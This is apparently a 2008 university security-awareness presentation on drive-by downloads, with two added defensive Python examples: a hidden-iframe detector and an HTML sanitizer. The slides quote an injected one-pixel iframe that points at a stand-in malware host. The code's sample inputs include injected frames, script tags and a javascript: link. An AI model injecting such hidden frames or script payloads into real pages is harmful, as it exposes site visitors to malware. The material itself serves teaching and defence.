Protecting Yourself On-line


Protecting Yourself On-line

Carol Taylor, Assistant Professor, Computer Science, EWU
Skye Hagen, Asst Director, Office of Information Technology, EWU

QSI Conference August 26-27, 2008


Overview

Security User Responses
Motivation
Drive-by Downloads
  Defining the problem
  Examples
  Recommendations

User Survey

How many people use Anti-virus? Do you keep it up to date?
How many people use anti-spyware programs?
Do you use firewall programs?
  Windows Firewall, Comodo Firewall Pro (others)
Do you back up the data on your computer?


Motivation

Why should you be concerned with Web security?
“I only shop at legitimate sites, I don’t ever visit sites with questionable content.” Is that enough to keep you safe?
That’s not enough to keep you safe in the current Web environment
Surfing regular e-commerce sites can infect your computer


Motivation

Statistics show that Web security is getting worse
ScanSafe reported a 220% increase in the amount of Web-based malware over the period 2007-2008
The volume of backdoor and password-stealing malware blocked by the firm increased by an order of magnitude: 855% between May 2007 and May 2008


Motivation

A website infected with malware is detected every five seconds (2008)
That represents a dramatic increase over the last 12 months
Websites poisoned with malware capable of infecting visitors' machines are being discovered at a rate of 16,173 per day, three times faster than in 2007

http://www.reuters.com/article/pressRelease/idUS120735+23-Jul-2008+BW20080723

More Motivation

Antivirus firm Sophos found that more than 90% of web pages capable of spreading Trojan horses and spyware are legitimate websites
Recent infected websites include those of ITV, Sony PlayStation, a golf page on the BBC site, and a variety of other commercial sites
Blogspot.com, the blog publishing system owned by Google, was found to be hosting two per cent of the world's web-based malware in June 2008


Motivation Summary

The threats are real!!!!
The Internet is an amazing collection of entertainment, knowledge, social opportunities and goods but …
The Internet is also a mirror for society
Crime, fraud, personal safety and privacy threats are real, just like in the real world
The main difference is that the threats are hidden; the risk is not obvious
You must protect yourself from these real dangers


Drive-by Downloads

This attack takes advantage of known vulnerabilities in browsers and operating systems
In a drive-by, an unsuspecting user (you) downloads and installs software without ever knowing it while surfing the web
Can happen when you agree to install browser plugins, run a Java Applet or JavaScript, or launch ActiveX applications
However, it can also happen without you doing anything
There are Web pages modified with code that redirects visitors to another site infected with malware that can break into your PC, without you even realizing it


Definitions

ActiveX Control or ActiveX: A program which can be embedded in a web page or downloaded from a web page and executed from within the browser itself. A browser must support ActiveX controls for this to work

JavaScript: A scripting language, based on both Java and C++, used to create code that is commonly embedded into HTML on web pages for enhanced functionality. For instance, validation of user-typed input on a form

Definitions

Java Applet: An applet is a small program, usually embedded in a web page, which can perform a number of duties such as playing audio or video clips and querying a database. These programs are normally written in Java


Drive-by Downloads

Unsuspecting users are victimized by simply doing what they do hundreds of times each day: visiting a Web page
Then, while you browse content normally, a computer virus or Trojan horse program is silently installed


Drive-by Downloads

Drive-by downloads are not new, but criminals have seized on the tactic lately because their success rate with traditional e-mail viruses has tapered off
Avoiding e-mail viruses is not always easy, but more likely as long as you follow clear rules like "don't click on any attachments"
But drive-by downloads are much more sinister
No user interaction is generally required beyond opening an infected site in a Web browser

Scope of the Problem

http://googleonlinesecurity.blogspot.com/2008/02/all-your-iframe-are-point-to-us.html

Google crawled billions of Web pages and found …
More than 3,000,000 unique URLs on over 180,000 web sites automatically installing malware

[Graph: % of daily Google queries that contain at least one harmful site in 2007]

Drive-by Downloads

How Web Sites get infected
One injection technique: gain access to the Web server that hosts the site
Attacker injects new content into the compromised website
Typically, injected content is a link that redirects visitors of these websites to a URL that hosts a script crafted to exploit the browser
To avoid visual detection by website owners, attackers use invisible HTML components
  e.g., zero pixel IFRAMEs hide injected content

Example of Web Server Compromise – “Italian Job”

2007: Online criminals launched a Web attack that compromised thousands of legitimate Web sites
Infected Web sites contain HTML "iFrame" code that redirects the victim's browser to a server that attempts to infect the victim's computer
Internet Explorer, Firefox, and Opera are vulnerable
Keyloggers and a Trojan downloader program were found on compromised PCs, so attackers can monitor the victim's activity and run other unauthorized programs on the computer
“They can turn your computer into anything they want”

http://www.networkworld.com/news/2007/061907-italian-job-web-attack.html

Example of Web Server Compromise – iFrame Example

The following code is injected into web pages. The size of the in-line frame is 1 pixel by 1 pixel, so it is not visible to the visitor of the site unless the person looks at the source code:

    <iframe src="http://remote.example.com/index.html" frameborder="0" width="1" height="1" scrolling="no" name="counter"></iframe>

On the above server, remote.example.com, the index.html file contained JavaScript code that attempted to exploit a recent Internet Explorer vulnerability to download, install, and run a malicious executable on the website visitor's computer
The executable was recognized by about half of anti-virus tools as a spyware trojan
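A defender-side check for the hidden-iframe pattern shown above, added here as an example and not part of the presentation: it parses HTML with Python's standard html.parser and reports any iframe that is sized 0 or 1 pixel, hidden by CSS, or carries the hidden attribute. The sample page is constructed for the example; remote.example.com is the placeholder host the slide uses and video.example.org is made up here to stand for a legitimate embed.

```python
"""Detect hidden iframes, the injection pattern shown on the slide.

Added example, not from the presentation. Standard library only.
SAMPLE_PAGE is constructed; remote.example.com is the placeholder host
used on the slide, video.example.org is made up for this example.
"""
import re
from html.parser import HTMLParser

# Sizes a legitimate, visible frame would not use.
TINY_SIZES = {"0", "1", "0px", "1px"}
# CSS that makes an element invisible without touching its size attributes.
HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# CSS that collapses the frame to zero width or height.
ZERO_CSS = re.compile(r"(?:^|[;\s])(?:width|height)\s*:\s*0(?:px)?\s*(?:;|$)", re.I)


class HiddenIframeFinder(HTMLParser):
    """Collects every <iframe> that is tiny or hidden, with the reasons."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":          # html.parser lower-cases tag names
            return
        a = {name: (value or "").strip().lower() for name, value in attrs}
        reasons = []
        if a.get("width") in TINY_SIZES and a.get("height") in TINY_SIZES:
            reasons.append("tiny size %sx%s" % (a["width"], a["height"]))
        style = a.get("style", "")
        if HIDDEN_CSS.search(style):
            reasons.append("hidden by CSS")
        if ZERO_CSS.search(style):
            reasons.append("zero size via CSS")
        if "hidden" in a:
            reasons.append("hidden attribute")
        if reasons:
            self.findings.append({"src": a.get("src", ""), "reasons": reasons})


def find_hidden_iframes(html):
    """Return a list of {src, reasons} dicts for suspicious iframes in html."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: one normal video embed plus two injected frames.
SAMPLE_PAGE = """<html><body>
<h1>Welcome to the shop</h1>
<iframe src="https://video.example.org/embed/42" width="560" height="315"></iframe>
<iframe src="http://remote.example.com/index.html" frameborder="0" width="1" height="1" scrolling="no" name="counter"></iframe>
<iframe src="http://remote.example.com/other.html" style="display:none;width:0;height:0"></iframe>
</body></html>"""


def scan_sample():
    """Run the finder over the constructed page."""
    return find_hidden_iframes(SAMPLE_PAGE)


if __name__ == "__main__":
    for finding in scan_sample():
        print(finding["src"], "->", ", ".join(finding["reasons"]))
```

Run it over a saved copy of a page (for example, fetched with a plain HTTP client rather than a browser) to find frames a visitor would never see; a site owner can run the same check over their own published pages after each deployment.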

Steps for Drive-by Download

Browser gets redirected by hidden link to remote.example.com
Downloads and executes hidden malware from index.html

http://research.google.com/archive/provos-2008a.pdf

Drive-by Downloads

How Web Sites get infected
Another common injection technique: use websites that allow users to contribute their own content
  Postings to forums or blogs
User contributed content may be restricted to text but often can also contain HTML such as links to images or other external content
Adversary can simply inject the exploit URL without the need to compromise the web server
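Because this variant rides on user-contributed content, the usual defence is an allow-list sanitizer on the server before a post is stored or rendered. The following is an added example, not code from the presentation or from any forum or blog product: it keeps plain text, a few formatting tags, and http/https links and images; removes iframes, scripts, event-handler attributes and javascript: URLs; and returns a list of what it removed so the site can log or alert on posts that carried injected markup. The sample post and the hosts in it are constructed.

```python
"""Allow-list sanitizer for user-contributed forum or blog content.

Added example, not from the presentation and not from any blog product.
Standard library only. SAMPLE_POST and the hosts in it are constructed.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags a post may keep, and the attributes allowed on each.
ALLOWED = {
    "p": set(), "br": set(), "b": set(), "i": set(), "em": set(), "strong": set(),
    "a": {"href"}, "img": {"src", "alt"},
}
VOID = {"br", "img"}                                   # no closing tag emitted
DROP_WITH_CONTENT = {"script", "style", "iframe", "object"}  # tag and body removed
URL_ATTRS = {"href", "src"}


def safe_url(value):
    """Only absolute http/https URLs; rejects javascript:, data:, vbscript: etc."""
    parts = urlparse(value.strip())
    return parts.scheme in ("http", "https") and bool(parts.netloc)


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0     # >0 while inside a dropped container
        self.dropped = []       # what was removed, for logging or alerting

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            self.dropped.append(tag)
            return
        if self.skip_depth:
            return
        if tag not in ALLOWED:
            self.dropped.append(tag)      # unknown tag removed, its text kept
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED[tag]:
                self.dropped.append("%s[%s]" % (tag, name))   # e.g. onclick
                continue
            if name in URL_ATTRS and not safe_url(value):
                self.dropped.append("%s[%s]" % (tag, name))   # e.g. javascript:
                continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            if self.skip_depth:
                self.skip_depth -= 1
            return
        if self.skip_depth or tag not in ALLOWED or tag in VOID:
            return
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data))   # re-escape so text stays text


def sanitize(html):
    """Return (clean_html, dropped_items) for one user-submitted fragment."""
    s = Sanitizer()
    s.feed(html)
    s.close()
    return "".join(s.out), s.dropped


# Constructed post mixing legitimate content with injected elements.
SAMPLE_POST = (
    '<p>Nice write-up! Screenshot: <img src="http://img.example.org/shot.png" alt="shot"></p>'
    '<iframe src="http://remote.example.com/index.html" width="1" height="1"></iframe>'
    '<a href="javascript:alert(1)">click</a> <script>evil()</script>'
    '<b onclick="x()">bold</b> 1 &lt; 2'
)


def sanitize_sample():
    """Sanitize the constructed post."""
    return sanitize(SAMPLE_POST)


if __name__ == "__main__":
    clean, dropped = sanitize_sample()
    print(clean)
    print("removed:", dropped)
```

The allow-list is deliberately small: anything not listed is removed rather than matched against a list of known-bad tags, which is what keeps a new hiding trick from slipping through. The returned list of dropped items is the signal worth monitoring; a sudden run of posts carrying iframe or script is exactly the pattern the slide describes.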

Example of User Contributed Content Compromise - Blog

WordPress is the most popular software for blogs
Should use the current installation of WordPress (WP), Version 2.5.1
There is an increasing number of blogs, all with version WP 2.3 and earlier, getting “hit” by the well known iFrame exploit that infects website visitors with a trojan download

Advice from Marc Liron – Sitebuilder pro

Example of User Contributed Content Compromise - Blog

Author Marc Liron had trouble loading a site from well known Internet Marketer Stu McLaren
So, he attempted to access Stu’s blog (June 2008)
  http://myideaguy.com/blog/ (DO NOT GO THERE)
A few moments after visiting the section:
  http://myideaguy.com/blog/category/products/ (DO NOT GO THERE)
His installation of Kaspersky Security Suite ALERTED that a TROJAN infection was trying to infect his computer!!!
The culprit was: Trojan-Downloader.HTML.Agent.is

http://www.marcliron.co.uk/sitebuilditreview/stu-mclarens-blog-gets-infected-by-hackers

Google Flags Malicious Sites

Site has repeated problems: http://www.wowstatus.net/
  World of Warcraft site
Google flagged it as hosting malicious content: http://www.google.com/interstitial?url=http://www.wowstatus.net/
One way sites are being flagged to alert you
However, not all sites are flagged ….

Signs You are Infected

Spyware alerts after you have visited a site
See a program pop up that you never loaded
  Asks you to do something (don’t do it!)
Web browser’s home page changed
Browser has new bookmarks
Pop-up window advertisements
Unusual files on your computer

How to Protect Yourself


User Behavior

If you think you have been infected, don’t say yes to anything
Close pop-up windows that appear
You get an offer to help you clean up your computer, remove spyware
As one researcher put it: “I rob you, then I run back and offer to help identify the culprit that did it”
Not too helpful …

Example Problem Pop-Up

If you click "Yes," spyware is installed.
Note the presence of a security certificate is no guarantee that something is not spyware.

Protection from Drive-by Downloads

Keep Operating system patched and up to date
Turn on automatic updates for OS
  Windows XP: Settings, choose Control Panel, then System
  Open the System Tool
  Turn on Automatic Updates

Protection from Drive-by Downloads

Use the latest browser: Firefox, Internet Explorer (IE), Opera
Keep browsers patched and up to date
Turn on automated updates for the browser
  Firefox, current version 2.0.0.16: automatic update is enabled by default, but to see the option go to Tools > Options > Advanced > Update
  Internet Explorer is up to version 7; it was an automatic update by MS. Use this latest version!!! Has phishing protection built in

Protection from Drive-by Downloads

Install several programs for removing spyware and viruses – These are free!!!
  Adaware SE: http://lavasoft.com/single/trialpay.php
  Spybot Search and Destroy: http://www.safer-networking.org/en/index.html
  AVG – virus program: http://free.avg.com/
  Avira AntiVir – another virus program: http://www.free-av.com/
    Review: http://www.viewpoints.com/Avira-AntiVir-Personal-Edition-Classic-review-5ed2029

Protection from Drive-by Downloads

Harden your Web browser
  Medium security is not good enough; set it to higher
  Disable active scripting or have it prompt you
  If you have problems, add sites to an accepted list

Firefox: Open the “Tools” menu. Select “Options”. Click “Content”. Click the check box to the left of “Disable JavaScript” so that a tick appears.

IE7: Open the “Tools” menu. Select “Internet Options…”. Click the “Security” tab. Click the “Internet” symbol (a globe). Click “Custom Level…”. In the Settings list, scroll down to “Scripting”. Under Active Scripting, click “Disable”.

Protection from Drive-by Downloads

Another way to protect yourself is by virtualizing your Web session, using ZoneAlarm’s ForceField
The virtualization technology in ForceField forms a "bubble of security" around the Web browser so that all unknown or unwanted changes from drive-by downloads are made to a virtualized file system
These disappear completely once the user is finished surfing
ForceField's virtualization claims to offer additional security by protecting the browser session from any malware that might be on the PC

http://www.zonealarm.com/store/content/catalog/products/zonealarm_forcefield.jsp

More protection using a free browser toolbar: Haute Secure

A company started by Microsoft employees
Produce a free toolbar supposed to protect you from bad web sites
Seems to be a good product
Can try it and report back

http://hautesecure.com/solutions.aspx

Summary

Internet is a scary place
Great place to hang out but … dangerous too
Ignore Security? Sure ….
  Result is your computer can be used for spam or to commit crime
  Your sensitive data can be compromised
  You will be a victim of theft
  Your computer may be unusable
Pay some attention, get or buy security software …
Security is a process!!!

Resources

EWU Security Awareness Site: http://www.ewu.edu/securityawareness
SANS Reading Room – lots of technical papers: http://www.sans.org/reading_room/
Drive-by Download Video: http://video.google.com/videoplay?docid=-3351512772400238297&ei=IPK0SLreOZTcqgOWjum9DA&q=Drive+by+download+%2B+watchgaurd&hl=en
StopBadware.org – search for bad websites: http://www.stopbadware.org/home/clearinghouse
Re-installing Windows XP – last resort: http://www.pcworld.com/article/129977/how_to_reinstall_windows_xp.html


This presentation can be found at

http://www.ewu.edu/securityawareness

My email: [email protected]

Questions